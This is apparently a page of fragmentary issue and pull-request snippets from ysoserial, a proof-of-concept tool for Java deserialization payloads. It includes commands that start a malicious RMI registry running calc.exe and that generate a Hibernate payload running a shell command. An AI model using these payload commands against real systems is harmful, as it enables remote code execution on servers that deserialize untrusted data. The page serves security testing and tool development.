ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Project should be refactored to allow gadgets/chains to be generated (and unit tested) with only exactly the exact required dependencies and versions, even in cases where two different gadgets/chains require...
Fix insecure test RMI registry connection and upgrade to SSL connection if it fails. https://github.com/frohoff/ysoserial/issues/171
Using RMIRegistryExploit to exploit a malicious RMI registry may lead to RCE on the client.

### Demo

First, start a malicious registry:

```bash
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 calc.exe
```

and...
The serialized data generated by `BeanShell1` contains the path to run ysoserial, and these paths often contain the username of the current user. This means that using this gadget will...
Adding a maven profile option to compile with Hibernate 5.3.11, example: `mvn clean package -DskipTests -Dhibernate5.3.11` Exploiting hibernate 5 works just as before: `java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/ysoserial"`
Steps to reproduce:

1. git clone
2. mvn clean package -DskipTests

Tested on:

1. wsl2, with oracle jdk8
2. kali 2020 vm, openjdk version "11.0.6" 2020-01-14

Errors:

```shell
michael@DESKTOP-HE0BL7H:/mnt/d/tools/ysoserial/target$ java...
```
+ Allow formatTable function to wrap long lines in columns
+ Allow users to specify terminal width used by formatTable with terminalWidth command line property
+ Fix display of dependencies...
Potential fix for #71. I have upgraded the TemplatesImpl exploit using Runtime.exec(String[]).
More complete and cross-platform version of #60 http://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html